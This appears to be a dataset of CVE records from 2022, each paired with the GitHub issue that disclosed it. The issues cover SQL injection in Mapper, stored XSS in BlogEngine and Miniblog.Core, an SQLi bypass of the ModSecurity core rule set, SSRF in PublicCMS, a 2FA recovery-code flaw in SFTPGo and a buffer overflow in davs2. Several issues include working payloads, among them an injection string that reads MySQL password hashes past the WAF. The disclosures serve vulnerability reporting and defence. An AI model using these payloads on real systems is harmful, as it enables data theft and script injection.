cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2022-36594
2022-09-02T04:15:11.363
Mapper v4.0.0 to v4.2.0 was discovered to contain a SQL injection vulnerability via the ids parameter at the selectByIds function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/abel533/Mapper/issues/862" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/abel533/Mapper/issues/862" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mybatis:mapper:*:*:*:*:*:*:*:*", "matchCriteriaId": "94A446F8-F70E-404C-B30D-B85F686F37C0", "versionEndExcluding": null, "versionEndIncluding": "4.2.0", "versionStartExcluding": null, "versionStartIncluding": "4.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/abel533/Mapper/issues/862
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "abel533", "Mapper" ]
Write the following test demo: 1、UserController.java: @Controller public class UserController { @Autowired UserService userService; @RequestMapping("gets") @ResponseBody public List<User> getUser(String ids) { List<String> idList = Arrays.asList(ids.split(",")); return userService.gets(idList); } } 2、UserService.java: @Service public interface UserService { List<User> gets(Collection<String> ids); } 3、UserServiceImpl.java: @Service public class UserServiceImpl implements UserService { @Autowired UserMapper userMapper; @Override public List<User> gets(Collection<String> ids) { if (ids == null || ids.isEmpty()) return new ArrayList<>(); String concatIds = StringUtils.concat(ids, "'", ","); return (List<User>) userMapper.selectByIds(concatIds); } } 4、UserMapper.java: @org.apache.ibatis.annotations.Mapper public interface UserMapper extends Mapper<User>, MySqlMapper<User>, IdsMapper<User> { } 5、Access the /gets route in the above demo for sql injection attack: (1)Under normal circumstances, when the ids parameter value is passed in 1, 2, the data with id 1 and 2 can be obtained: ![image](https://user-images.githubusercontent.com/42132951/179915362-cafa69ba-285a-408a-ba20-193e99a08963.png) (2)But when the ids parameter value is 1') or 1=1-- -, you can get all the data in the database: ![image](https://user-images.githubusercontent.com/42132951/179917272-ffdc9cce-0005-4cad-a1e9-911445715c10.png)
selectByIds function sql injection
https://api.github.com/repos/abel533/Mapper/issues/862/comments
3
2022-07-20T06:58:52Z
2022-07-21T00:53:13Z
https://github.com/abel533/Mapper/issues/862
1,310,540,938
862
4,083
CVE-2022-36600
2022-09-02T05:15:07.417
BlogEngine v3.3.8.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /blogengine/api/posts. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Description field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/BlogEngine/BlogEngine.NET/issues/254" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/BlogEngine/BlogEngine.NET/issues/254" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:blogengine:blogengine.net:3.3.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C215046E-4B0C-44AD-B0C4-D055FE17A873", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/BlogEngine/BlogEngine.NET/issues/254
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "BlogEngine", "BlogEngine.NET" ]
A Cross Site Scripting vulnerabilty exists in BlogEngine via the Description field in /blogengine/api/posts Step to exploit: 1. Login as admin. 2. Navigate to http://127.0.0.1/blogengine/admin/#/content/posts and click on "NEW". 3. Insert XSS payload `<img src=1 onerror=alert('XSS')>` in the "Description" field and click on SAVE, PUBLISH. 4. Go to Home page. ![1](https://user-images.githubusercontent.com/35623498/180025797-bacb40da-5922-4017-83c9-5489997715e5.PNG) ![2](https://user-images.githubusercontent.com/35623498/180025817-e07f48f3-cc1c-4675-afdf-d1a9946f4c97.PNG) ![3](https://user-images.githubusercontent.com/35623498/180025829-cb63e4da-6059-4f52-a961-7d7f0d032d93.PNG)
Cross-Site Scripting (XSS) in "/blogengine/api/posts"
https://api.github.com/repos/BlogEngine/BlogEngine.NET/issues/254/comments
0
2022-07-20T15:46:07Z
2022-08-01T03:49:37Z
https://github.com/BlogEngine/BlogEngine.NET/issues/254
1,311,382,952
254
4,084
CVE-2022-37679
2022-09-02T05:15:07.610
Miniblog.Core v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /blog/edit. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Excerpt field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/madskristensen/Miniblog.Core/issues/178" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/madskristensen/Miniblog.Core/issues/178" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:miniblog.core_project:miniblog.core:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "49DAF53E-1D8A-41BA-8408-5B4590DE33B4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/madskristensen/Miniblog.Core/issues/178
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "madskristensen", "Miniblog.Core" ]
A Cross Site Scripting vulnerabilty exists in Miniblog.Core via the Excerpt field in "/posts" Step to exploit: 1. Login as admin. 2. Navigate to https://miniblogcore.azurewebsites.net/blog/edit. 3. Insert XSS payload `<img src=1 onerror=alert('XSS')>` in the "Excerpt" field and click on Save. 4. Go to Home page. <img width="1306" alt="Screenshot 2022-08-01 at 10 26 30" src="https://user-images.githubusercontent.com/35623498/182067426-94e1946a-051d-451a-994f-2f17cd1402c8.png"> <img width="1345" alt="Screenshot 2022-08-01 at 10 27 01" src="https://user-images.githubusercontent.com/35623498/182067447-51601603-eee6-41b2-ac14-d81986619f3f.png"> <img width="1011" alt="Screenshot 2022-08-01 at 10 38 06" src="https://user-images.githubusercontent.com/35623498/182067526-cd8310fa-545e-40ff-8692-89dfa120a635.png">
Cross-Site Scripting (XSS) in "/posts"
https://api.github.com/repos/madskristensen/Miniblog.Core/issues/178/comments
0
2022-08-01T03:39:09Z
2022-08-01T03:39:09Z
https://github.com/madskristensen/Miniblog.Core/issues/178
1,323,762,815
178
4,085
CVE-2020-22669
2022-09-02T18:15:11.607
Modsecurity owasp-modsecurity-crs 3.2.0 (Paranoia level at PL1) has a SQL injection bypass vulnerability. Attackers can use the comment characters and variable assignments in the SQL syntax to bypass Modsecurity WAF protection and implement SQL injection attacks on Web applications.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1727" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/coreruleset/coreruleset/pull/1793" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00033.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1727" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/coreruleset/coreruleset/pull/1793" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00033.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:owasp:owasp_modsecurity_core_rule_set:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "2DABE2C3-F827-4B87-8051-7EE4C536FE0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1727
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "SpiderLabs", "owasp-modsecurity-crs" ]
### Description Fuzz found that the following request can bypass modesecurity rules and implement SQLi injection. sample code:`user.php`(id parameter has SQL injection security issues) ``` <?php echo "<head><title>SQL injection demo</title></head>"; $id=$_GET['id']; $conn=new mysqli('127.0.0.1','root','root','test'); if(!$conn){ die("Error to connect database!"); } $sql="select username from user where id={$id}"; # echo "$sql"."</br></br>"; $res=$conn->query($sql); if($res){ $row=$res->fetch_row(); echo "\t Hello <b>".htmlspecialchars($row[0])." </b>,having a good day!"; $res->free(); $conn->close(); } else{ echo "<b>error</b>"; } ?> ``` Database table contents: ``` mysql> use test; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> select * from user; +----+----------+----------------------------------+ | id | username | passwd | +----+----------+----------------------------------+ | 1 | admin | 21232f297a57a5a743894a0e4a801fc3 | | 2 | root | 63a9f0ea7bb98050796b649e85481845 | | 3 | test | 098f6bcd4621d373cade4e832627b4f6 | +----+----------+----------------------------------+ 3 rows in set (0.00 sec) The request is as follows: ``` Normal request ``` http://127.0.0.1/user.php?id=1 ``` ![image](https://user-images.githubusercontent.com/39592354/78272586-48535900-7540-11ea-8005-d5ef5cf6aadf.png) evil request: id=1 and 1=1 (blocked by CRS) ![image](https://user-images.githubusercontent.com/39592354/78272800-8ea8b800-7540-11ea-8e61-6fb452527a27.png) request(bypass CRS3.2.0) for SQL injection: ``` http://127.0.0.1/user.php?id=@.:=right(right((select authentication_string from mysql.user limit 0,1),1111),1111) union%23%0adistinctrow%0bselect@. ``` ![image](https://user-images.githubusercontent.com/39592354/77826882-46a72100-714d-11ea-8ac4-44ac9a800784.png) It can be seen that the user password in the user table in the mysql database is successfully obtained through this bypass method. ### Environment - CRS version (e.g., v3.2.0): v3.2.0 - Paranoia level setting: PL1 - ModSecurity version (e.g., 2.9.3): 2.9.3/3.0.4 - Web Server and version (e.g, apache 2.4.41): apache2.4.18/nginx1.16.1 - Operating System and version: Ubuntu18.04 - Mysql Version: 5.7.29 Looking forward to fixing it as soon as possible beacause it threatens the security of the database content.
SQLi bypass at PL1(CRS 3.2.0)
https://api.github.com/repos/SpiderLabs/owasp-modsecurity-crs/issues/1727/comments
1
2020-03-28T15:47:00Z
2020-04-03T23:31:41Z
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1727
589,601,789
1,727
4,086
CVE-2021-27693
2022-09-02T18:15:11.687
Server-side Request Forgery (SSRF) vulnerability in PublicCMS before 4.0.202011.b via /publiccms/admin/ueditor when the action is catchimage.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/sanluan/PublicCMS/commit/0f4c4872914b6a71305e121a7d9a19c07cde0338" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sanluan/PublicCMS/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/sanluan/PublicCMS/commit/0f4c4872914b6a71305e121a7d9a19c07cde0338" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sanluan/PublicCMS/issues/51" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:publiccms:publiccms:*:*:*:*:*:*:*:*", "matchCriteriaId": "C947C87C-1E2D-4732-9A7A-84652BCF240E", "versionEndExcluding": "4.0.202011.b", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/sanluan/PublicCMS/issues/51
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sanluan", "PublicCMS" ]
Hello,I found a SSRF in the lastest version of PublicCMS-V4.0.202011.b The vulnerability is triggered by visiting the following address after logging in the management background http://192.168.6.237:8081/publiccms/admin/ueditor?action=catchimage&file%5b%5d=http://192.168.103.3 http://192.168.6.237:8081/publiccms/admin/ueditor?action=catchimage&file%5B%5D=https://www.baidu.com The "file[]" parameter has a loophole, and the IP and domain names that access is not restricted, resulting in an SSRF loophole. Error is returned when the detection service and port are not open: ![image](https://user-images.githubusercontent.com/39592354/108824059-3b2dd580-75fc-11eb-8bea-0a2c2f2f0df2.png) Return success when detecting service and port opening: ![image](https://user-images.githubusercontent.com/39592354/108824076-408b2000-75fc-11eb-9f35-3594d0a285da.png) ![image](https://user-images.githubusercontent.com/39592354/108824087-441ea700-75fc-11eb-91b9-ada3d247c254.png) Attackers can use this vulnerability to scan the internal network for open hosts and ports, and attack applications with vulnerabilities in the internal network, such as redis, struts2, etc., and further gain control of the server system. PublicCMS is a useful development cms, I think we need to pay attention to and fix this security issue, looking forward to your reply.
There is a SSRF vulnerability via /publiccms/admin/ueditor
https://api.github.com/repos/sanluan/PublicCMS/issues/51/comments
1
2021-02-23T09:33:07Z
2021-10-28T04:55:16Z
https://github.com/sanluan/PublicCMS/issues/51
814,280,961
51
4,087
CVE-2022-36071
2022-09-02T18:15:12.150
SFTPGo is configurable SFTP server with optional HTTP/S, FTP/S and WebDAV support. SFTPGo WebAdmin and WebClient support login using TOTP (Time-based One Time Passwords) as a secondary authentication factor. Because TOTPs are often configured on mobile devices that can be lost, stolen or damaged, SFTPGo also supports recovery codes. These are a set of one time use codes that can be used instead of the TOTP. In SFTPGo versions from version 2.2.0 to 2.3.3 recovery codes can be generated before enabling two-factor authentication. An attacker who knows the user's password could potentially generate some recovery codes and then bypass two-factor authentication after it is enabled on the account at a later time. This issue has been fixed in version 2.3.4. Recovery codes can now only be generated after enabling two-factor authentication and are deleted after disabling it.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 8.3, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.5, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/drakkan/sftpgo/issues/965" }, { "source": "security-advisories@github.com", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/drakkan/sftpgo/security/advisories/GHSA-54qx-8p8w-xhg8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/drakkan/sftpgo/issues/965" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/drakkan/sftpgo/security/advisories/GHSA-54qx-8p8w-xhg8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sftpgo_project:sftpgo:*:*:*:*:*:*:*:*", "matchCriteriaId": "154C23FB-9676-4167-A174-476FB50A6C06", "versionEndExcluding": "2.3.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.2.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "916" ]
916
https://github.com/drakkan/sftpgo/issues/965
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "drakkan", "sftpgo" ]
**Area** Web Client MFA /web/client/mfa **Summary** Not sure if this is the expected behaviour, but a user required to use MFA has the option to generate recovery codes even before configuring and enabling it on account . This option is available after logging in with username / password. This means an attacker that knows the user's password could potentially generate a bunch of recovery codes bypassing 2FA after it enabled on account at a later date. **Steps to reproduce as Admin** As an Admin create a new account for a user with a password but enable requirement for MFA. **Steps to reproduce the behavior user:** The user logs into the webclient and will get this page ![image](https://user-images.githubusercontent.com/8626343/187489807-fc73806c-9d63-4bbe-b0fe-dc49dcc2f094.png) on all other options when the user clicks they get image above ![image](https://user-images.githubusercontent.com/8626343/187489980-d6a82579-0515-4b48-a388-9004c80095fa.png) Scroll to bottom and click Generate codes and store it for later. ![image](https://user-images.githubusercontent.com/8626343/187490239-35b4d8e7-e9dd-433f-9e7a-1db5f05d9daf.png) After enable 2FA **Expected behavior** Options to generate codes should not be visible until 2FA has been enabled on account i would have thought? ![image](https://user-images.githubusercontent.com/8626343/187490636-a036fb58-f095-4512-9fc8-135c9a5d8392.png) **System info :** OS Name: Redhat OS Version: 9 sftpgo version: SFTPGo 2.3.3-665016e-2022-08-05T08:54:48Z +metrics +azblob +gcs +s3 +bolt +mysql +pgsql +sqlite +portable sftpgo install source: Yum
TOTP Generate Recovery Codes MFA
https://api.github.com/repos/drakkan/sftpgo/issues/965/comments
1
2022-08-30T16:36:09Z
2022-09-01T14:23:52Z
https://github.com/drakkan/sftpgo/issues/965
1,356,032,979
965
4,088
CVE-2022-36647
2022-09-02T22:15:08.523
PKUVCL davs2 v1.6.205 was discovered to contain a global buffer overflow via the function parse_sequence_header() at source/common/header.cc:269.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pkuvcl/davs2/issues/29" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pkuvcl/davs2/issues/29" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:davs2_project:davs2:1.6.205:*:*:*:*:*:*:*", "matchCriteriaId": "BC996119-1C77-46E0-AC3D-AB460FB614CC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/pkuvcl/davs2/issues/29
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pkuvcl", "davs2" ]
**Describe the bug** Bug Relevant code as follows: ==================================================================================== static int parse_sequence_header(davs2_mgr_t *mgr, davs2_seq_t *seq, davs2_bs_t *bs) { ...... seq->head.bitrate = ((seq->bit_rate_upper << 18) + seq->bit_rate_lower) * 400; seq->head.frame_rate = FRAME_RATE[seq->head.frame_rate_id - 1]; // <------ read overflow here seq->i_enc_width = ((seq->head.width + MIN_CU_SIZE - 1) >> MIN_CU_SIZE_IN_BIT) << MIN_CU_SIZE_IN_BIT; seq->i_enc_height = ((seq->head.height + MIN_CU_SIZE - 1) >> MIN_CU_SIZE_IN_BIT) << MIN_CU_SIZE_IN_BIT; seq->valid_flag = 1; } ==================================================================================== This is a security issue. **To Reproduce** cd /path/to/davs2/build/linux/ ./configure --enable-pic vim config.mak (add -fsanitizer=address to CFLAGS, and -fsanitizer=address -lasan to LDFLAGS) make ./davs2 -i /path/to/poc1.avs -o test.yuv **ASAN Crash log** ================================================================= ==4112727==ERROR: AddressSanitizer: global-buffer-overflow on address 0x555555956808 at pc 0x5555555a44d0 bp 0x7fffffffc910 sp 0x7fffffffc900 READ of size 4 at 0x555555956808 thread T0 #0 0x5555555a44cf in parse_sequence_header /root/arayz/davs2/source/common/header.cc:269 #1 0x5555555b1ffb in davs2_parse_header /root/arayz/davs2/source/common/header.cc:1517 #2 0x555555572af9 in decoder_decode_es_unit(davs2_mgr_t*, es_unit_t*) /root/arayz/davs2/source/common/davs2.cc:600 #3 0x555555573617 in davs2_decoder_send_packet /root/arayz/davs2/source/common/davs2.cc:676 #4 0x5555555703b3 in test_decoder /root/arayz/davs2/source/test/test.c:231 #5 0x555555564fdf in main /root/arayz/davs2/source/test/test.c:329 #6 0x7ffff7096d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 #7 0x7ffff7096e3f in __libc_start_main_impl ../csu/libc-start.c:392 #8 0x5555555663d4 in _start (/root/arayz/davs2/build/linux/davs2+0x123d4) 0x555555956808 is located 24 bytes to the left of global variable 'BETA_TABLE' defined in '/root/arayz/davs2/source/common/header.cc:69:22' (0x555555956820) of size 64 0x555555956808 is located 8 bytes to the right of global variable 'FRAME_RATE' defined in '/root/arayz/davs2/source/common/header.cc:121:24' (0x5555559567e0) of size 32 SUMMARY: AddressSanitizer: global-buffer-overflow /root/arayz/davs2/source/common/header.cc:269 in parse_sequence_header Shadow bytes around the buggy address: 0x0aab2ab22cb0: f9 f9 f9 f9 00 00 00 07 f9 f9 f9 f9 00 00 00 06 0x0aab2ab22cc0: f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9 00 00 00 04 0x0aab2ab22cd0: f9 f9 f9 f9 00 00 00 00 07 f9 f9 f9 f9 f9 f9 f9 0x0aab2ab22ce0: 00 00 00 00 05 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 0x0aab2ab22cf0: 00 03 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 =>0x0aab2ab22d00: f9[f9]f9 f9 00 00 00 00 00 00 00 00 f9 f9 f9 f9 0x0aab2ab22d10: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00 0x0aab2ab22d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0aab2ab22d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0aab2ab22d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0aab2ab22d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==4112727==ABORTING **Additional context** - OS: Ubuntu 22.04 (server) - Compiler gcc version 11.2.0 (Ubuntu 11.2.0-19ubuntu1) PoC: [poc1.zip](https://github.com/pkuvcl/davs2/files/9158662/poc1.zip)
Global-buffer-overflow in parse_sequence_header() --> source/common/header.cc:269
https://api.github.com/repos/pkuvcl/davs2/issues/29/comments
3
2022-07-21T10:50:43Z
2022-09-03T13:39:10Z
https://github.com/pkuvcl/davs2/issues/29
1,313,064,467
29
4,089
CVE-2022-39829
2022-09-05T04:15:08.790
There is a NULL pointer dereference in aes256_encrypt in Samsung mTower through 0.3.0 due to a missing check on the return value of EVP_CIPHER_CTX_new.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
